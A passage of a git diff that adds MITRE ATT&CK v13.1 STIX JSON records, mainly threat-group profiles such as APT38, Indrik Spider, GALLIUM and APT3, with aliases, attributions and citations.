Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.056Z", + "name": "Component Object Model Hijacking Mitigation", + "description": "Direct mitigation of this technique may not be recommended for a particular environment since COM objects are a legitimate part of the operating system and installed software. Blocking COM object changes may have unforeseen side effects to legitimate functionality.\n\nInstead, identify and block potentially malicious software that may execute, or be executed by, this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/enterprise-attack.json b/cti-ATT-CK-v13.1/enterprise-attack/enterprise-attack.json new file mode 100644 index 0000000000000000000000000000000000000000..bb29ff7c89db1a03cf8c17f0c9abeb3357310cb1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/enterprise-attack.json @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02f3755e4260c81318b1dfdca57451228f7a09c9beff9839ed67e24327ea3933 +size 27944639 diff --git a/cti-ATT-CK-v13.1/enterprise-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json b/cti-ATT-CK-v13.1/enterprise-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json new file mode 100644 index 0000000000000000000000000000000000000000..2998775361204321e17e480cdaa7a8322b1c134c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json 
@@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--74668457-0e6f-4650-8b90-f711ee07ffa5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "type": "identity", + "identity_class": "organization", + "created": "2017-06-01T00:00:00.000Z", + "modified": "2017-06-01T00:00:00.000Z", + "name": "The MITRE Corporation" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json new file mode 100644 index 0000000000000000000000000000000000000000..207680539104c86fd46ae3e23303c7d592952eff --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json 
@@ -0,0 +1,94 @@ +{ + "type": "bundle", + "id": "bundle--1eb70160-9248-4f68-af0e-f5408905717d", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT38", + "NICKEL GLADSTONE", + "BeagleBoyz", + "Bluenoroff", + "Stardust Chollima" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340", + "type": "intrusion-set", + "created": "2019-01-29T21:27:24.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0082", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0082" + }, + { + "source_name": "APT38", + "description": "(Citation: FireEye APT38 Oct 2018)" + }, + { + "source_name": "NICKEL GLADSTONE", + "description": "(Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)" + }, + { + "source_name": "BeagleBoyz", + "description": "(Citation: CISA AA20-239A BeagleBoyz August 2020)" + }, + { + "source_name": "Bluenoroff", + "description": "(Citation: Kaspersky Lazarus Under The Hood Blog 2017)" + }, + { + "source_name": "Stardust Chollima", + "description": "(Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)" + }, + { + "source_name": "CISA AA20-239A BeagleBoyz August 2020", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-239a", + "description": "DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021." + }, + { + "source_name": "FireEye APT38 Oct 2018", + "url": "https://content.fireeye.com/apt/rpt-apt38", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018." 
+ }, + { + "source_name": "DOJ North Korea Indictment Feb 2021", + "url": "https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and", + "description": "Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021." + }, + { + "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.", + "url": "https://securelist.com/lazarus-under-the-hood/77908/", + "source_name": "Kaspersky Lazarus Under The Hood Blog 2017" + }, + { + "source_name": "SecureWorks NICKEL GLADSTONE profile Sept 2021", + "url": "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", + "description": "SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike Stardust Chollima Profile April 2018", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/", + "description": "Meyers, Adam. (2018, April 6). Meet CrowdStrike\u2019s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike GTR 2021 June 2021", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "description": "CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021." 
+ } + ], + "modified": "2022-01-18T17:13:14.610Z", + "name": "APT38", + "description": "[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07.json new file mode 100644 index 0000000000000000000000000000000000000000..8c8bafdc61fcb2c6f5b457eff2b77b24df7dfe7a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--bd5a1953-2ab8-42dd-ac9f-12316e053970", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-15T19:49:18.799Z", + "name": "Indrik Spider", + "description": "[Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)", + "aliases": [ + "Indrik Spider", + "Evil Corp" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "type": "intrusion-set", + "id": "intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07", + "created": "2021-01-06T17:46:35.134Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0119", + "external_id": "G0119" + }, + { + "source_name": "Evil Corp", + "description": "(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)" + }, + { + "source_name": "Crowdstrike Indrik November 2018", + "description": "Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/" + }, + { + "source_name": "Crowdstrike EvilCorp March 2021", + "description": "Podlosky, A., Feeley, B. (2021, March 17). 
INDRIK SPIDER Supersedes WastedLocker with Hades Ransomware to Circumvent OFAC Sanctions. Retrieved September 15, 2021.", + "url": "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/" + }, + { + "source_name": "Treasury EvilCorp Dec 2019", + "description": "U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021.", + "url": "https://home.treasury.gov/news/press-releases/sm845" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--025bdaa9-897d-4bad-afa6-013ba5734653.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--025bdaa9-897d-4bad-afa6-013ba5734653.json new file mode 100644 index 0000000000000000000000000000000000000000..9ed088a320f91f1640a941475e5f5c1a1f6c3f9a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--025bdaa9-897d-4bad-afa6-013ba5734653.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--6b101dc5-c6ae-423f-b495-6f4b60927427", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "NEODYMIUM" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--025bdaa9-897d-4bad-afa6-013ba5734653", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0055", + "external_id": "G0055" + }, + { + "source_name": "NEODYMIUM", + "description": "(Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)" + }, + { + "url": "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/", + "description": "Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.", + "source_name": "Microsoft NEODYMIUM Dec 2016" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + }, + { + "url": "https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/", + "description": "Bing, C. (2017, October 16). Middle Eastern hacking group is using FinFisher malware to conduct international espionage. 
Retrieved February 15, 2018.", + "source_name": "CyberScoop BlackOasis Oct 2017" + } + ], + "modified": "2019-03-25T14:31:40.855Z", + "name": "NEODYMIUM", + "description": "[NEODYMIUM](https://attack.mitre.org/groups/G0055) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://attack.mitre.org/groups/G0056) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21) [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484.json new file mode 100644 index 0000000000000000000000000000000000000000..a4bb0c6397d60e6feaefadab6e4f24cf80766f4a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484.json 
@@ -0,0 +1,71 @@ +{ + "type": "bundle", + "id": "bundle--9b0829be-b0a0-4142-97c7-ca9ccfa02048", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Elderwood", + "Elderwood Gang", + "Beijing Group", + "Sneaky Panda" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Valerii Marchuk, Cybersecurity Help s.r.o." + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484", + "type": "intrusion-set", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0066", + "external_id": "G0066" + }, + { + "source_name": "Elderwood", + "description": "(Citation: Security Affairs Elderwood Sept 2012) (Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)" + }, + { + "source_name": "Elderwood Gang", + "description": "(Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)" + }, + { + "source_name": "Beijing Group", + "description": "(Citation: CSM Elderwood Sept 2012)" + }, + { + "source_name": "Sneaky Panda", + "description": "(Citation: CSM Elderwood Sept 2012)" + }, + { + "url": "http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html", + "description": "Paganini, P. (2012, September 9). Elderwood project, who is behind Op. Aurora and ongoing attacks?. Retrieved February 13, 2018.", + "source_name": "Security Affairs Elderwood Sept 2012" + }, + { + "url": "https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "description": "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. 
Retrieved February 15, 2018.", + "source_name": "Symantec Elderwood Sept 2012" + }, + { + "url": "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + "description": "Clayton, M.. (2012, September 14). Stealing US business secrets: Experts ID two huge cyber 'gangs' in China. Retrieved February 15, 2018.", + "source_name": "CSM Elderwood Sept 2012" + } + ], + "modified": "2021-03-02T22:40:11.097Z", + "name": "Elderwood", + "description": "[Elderwood](https://attack.mitre.org/groups/G0066) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. (Citation: Security Affairs Elderwood Sept 2012) The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. (Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)", + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03be849d-b5a2-4766-9dda-48976bae5710.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03be849d-b5a2-4766-9dda-48976bae5710.json new file mode 100644 index 0000000000000000000000000000000000000000..1030d4ff79a275ed3b1ab993c0583d6889a9be50 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03be849d-b5a2-4766-9dda-48976bae5710.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--4209620b-68ca-4ee3-8d37-1c70c414eaf6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T18:51:09.213Z", + "name": "SideCopy", + "description": "[SideCopy](https://attack.mitre.org/groups/G1008) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://attack.mitre.org/groups/G1008)'s name comes from its infection chain that tries to mimic that of [Sidewinder](https://attack.mitre.org/groups/G0121), a suspected Indian threat group.(Citation: MalwareBytes SideCopy Dec 2021)", + "aliases": [ + "SideCopy" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India" + ], + "type": "intrusion-set", + "id": "intrusion-set--03be849d-b5a2-4766-9dda-48976bae5710", + "created": "2022-08-07T13:52:07.791Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1008", + "external_id": "G1008" + }, + { + "source_name": "MalwareBytes SideCopy Dec 2021", + "description": "Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022.", + "url": "https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258.json new file mode 100644 index 0000000000000000000000000000000000000000..60c2380e444369f72bda85ff2563e7467dfa529d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258.json 
@@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--8b75c87a-b24f-4c55-9d6c-760d747c3a81", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "GALLIUM", + "Operation Soft Cell" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security", + "Cybereason Nocturnus, @nocturnus" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258", + "created": "2019-07-18T20:47:50.050Z", + "x_mitre_version": "3.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0093", + "url": "https://attack.mitre.org/groups/G0093" + }, + { + "source_name": "Operation Soft Cell", + "description": "(Citation: Cybereason Soft Cell June 2019)" + }, + { + "source_name": "GALLIUM", + "description": "(Citation: Microsoft GALLIUM December 2019)" + }, + { + "source_name": "Cybereason Soft Cell June 2019", + "url": "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "description": "Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019." + }, + { + "source_name": "Microsoft GALLIUM December 2019", + "url": "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "description": "MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021." + }, + { + "source_name": "Unit 42 PingPull Jun 2022", + "url": "https://unit42.paloaltonetworks.com/pingpull-gallium/", + "description": "Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)", + "modified": "2022-08-12T21:26:22.303Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "GALLIUM", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json new file mode 100644 index 0000000000000000000000000000000000000000..ff902581ca282c5a482ed78d302145b6b36b8081 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--8afbf3f3-8bae-40e3-bb90-2ab3c42d6dce", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT17", + "Deputy Dog" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "type": "intrusion-set", + "created": "2017-05-31T21:31:57.307Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0025", + "external_id": "G0025" + }, + { + "source_name": "APT17", + "description": "(Citation: FireEye APT17)" + }, + { + "source_name": "Deputy Dog", + "description": "(Citation: FireEye APT17)" + }, + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "modified": "2020-10-13T22:33:14.018Z", + "name": "APT17", + "description": "[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0bbdf25b-30ff-4894-a1cd-49260d0dd2d9.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0bbdf25b-30ff-4894-a1cd-49260d0dd2d9.json new file mode 100644 index 0000000000000000000000000000000000000000..accef4c9561625d90a85d46c0895ccac76db472e 
--- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0bbdf25b-30ff-4894-a1cd-49260d0dd2d9.json 
@@ -0,0 +1,101 @@ +{ + "type": "bundle", + "id": "bundle--9e437a17-a0a8-449c-96cd-0b372efaa050", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT3", + "Gothic Panda", + "Pirpi", + "UPS Team", + "Buckeye", + "Threat Group-0110", + "TG-0110" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Patrick Sungbahadoor" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--0bbdf25b-30ff-4894-a1cd-49260d0dd2d9", + "type": "intrusion-set", + "created": "2017-05-31T21:31:55.853Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0022", + "external_id": "G0022" + }, + { + "source_name": "APT3", + "description": "(Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)" + }, + { + "source_name": "Gothic Panda", + "description": "(Citation: PWC Pirpi Scanbox) (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)" + }, + { + "source_name": "Pirpi", + "description": "(Citation: PWC Pirpi Scanbox)" + }, + { + "source_name": "UPS Team", + "description": "(Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)" + }, + { + "source_name": "Buckeye", + "description": "(Citation: Symantec Buckeye)" + }, + { + "source_name": "Threat Group-0110", + "description": "(Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)" + }, + { + "source_name": "TG-0110", + "description": "(Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)" + }, + { + "source_name": "FireEye Clandestine Wolf", + "description": "Eng, E., Caselden, D.. (2015, June 23). Operation Clandestine Wolf \u2013 Adobe Flash Zero-Day in APT3 Phishing Campaign. 
Retrieved January 14, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html" + }, + { + "source_name": "Recorded Future APT3 May 2017", + "description": "Insikt Group (Recorded Future). (2017, May 17). Recorded Future Research Concludes Chinese Ministry of State Security Behind APT3. Retrieved June 18, 2017.", + "url": "https://www.recordedfuture.com/chinese-mss-behind-apt3/" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "description": "Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016.", + "source_name": "FireEye Operation Double Tap" + }, + { + "source_name": "Symantec Buckeye", + "description": "Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.", + "url": "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + }, + { + "url": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "description": "Korban, C, et al. (2017, September). APT3 Adversary Emulation Plan. Retrieved January 16, 2018.", + "source_name": "APT3 Adversary Emulation Plan" + }, + { + "source_name": "PWC Pirpi Scanbox", + "description": "Lancaster, T. (2015, July 25). A tale of Pirpi, Scanbox & CVE-2015-3113. 
Retrieved March 30, 2016.", + "url": "http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html" + } + ], + "modified": "2021-10-01T19:09:20.817Z", + "name": "APT3", + "description": "[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye)\n\nIn 2017, MITRE developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)", + "x_mitre_version": "1.4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f.json 